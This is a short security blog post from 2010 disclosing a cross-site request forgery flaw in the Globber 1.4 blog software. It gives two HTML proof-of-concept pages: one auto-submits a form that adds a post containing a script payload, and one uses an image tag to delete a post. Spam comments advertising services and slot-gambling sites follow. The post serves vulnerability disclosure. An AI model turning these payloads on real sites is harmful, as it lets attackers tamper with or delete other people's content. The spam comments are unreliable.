This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

Globber 1.4 Cross-site Request Forgery

A cross-site request forgery vulnerability in Globber can be exploited
to add and delete blog posts.

PoC
<!-- Add (note that blog also must be "rebuilt") -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
<input type="hidden" name="title" value="New Article" />
<input type="hidden" name="date" value="06-07-2010 10:16 pm" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
</form>
</body>
</html>

<!-- Delete -->
<html>
<body>
<img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
</body>
</html>

9 comments:

  1. This particular is usually apparently essential and moreover outstanding truth along with for sure fair-minded and moreover admittedly useful My business is looking to find in advance designed for this specific useful stuffs…  Inpatient treatment el paso texas

    ReplyDelete
  2. Allresulthub.com is an independent education & employment news portal. We provide the latest news updates of education for students and job seekers in Bangladesh. We strive to provide you with error-free articles that are full of information and statistics. Our aim is to provide quality & factual information and a great user experience.
    1. SSC Exam Result & HSC Exam Result
    2. SSC Exam Result 2021 & HSC Exam Result 2021
    3. SSC Exam Result 2021 & HSC Exam Result 2021
    4. Admit Card for the Examination
    5. Govt Jobs, Bank Jobs, Defence Jobs, NGO Jobs, Private Jobs
    6. Admission Result
    7. Primary Admit Card
    8. SSC Exam Result 2021
    9. Job Circular Exam Result

    ReplyDelete
  3. Wow! Such an amazing and helpful post this is. I really really love it. It's so good and so awesome. I am just amazed. I hope that you continue to do your work like this in the future also custom leather patches Best security guard services company

    ReplyDelete
  4. Jili Slot เป็นผู้ให้บริการเกมคาสิโนออนไลน์และก็สล็อตออนไลน์ มีเกมสนุกสนานๆให้เลือกเล่นมาก สามารถเข้าไปเล่น jili slot เล่นผ่านเว็บไซต์ของพวกเราได้เลย ที่เว็บไซต์ pgslot

    ReplyDelete
  5. สล็อตเว็บตรง ในสมัยนี้ได้อัปเดตระบบกันจนทำให้ลูกค้าทั้งผู้เล่นเก่าและผู้เล่นใหม่สะดวกสบายกันมากขึ้นอีกด้วย เพราะสล็อตเว็บตรง ได้อัปเดตระบบเล่นในมือถือได้แล้วและ ทางเข้าPG slot มือถือ เป็นทางเข้าที่ลูกค้าเข้าเล่นได้ง่ายและสะดวกสบายสำหรับคนที่ไม่มีคอมพิวเตอร์และสามารถเข้าเล่นได้ง่ายกว่าในคอมพิวเตอร์อีก

    ReplyDelete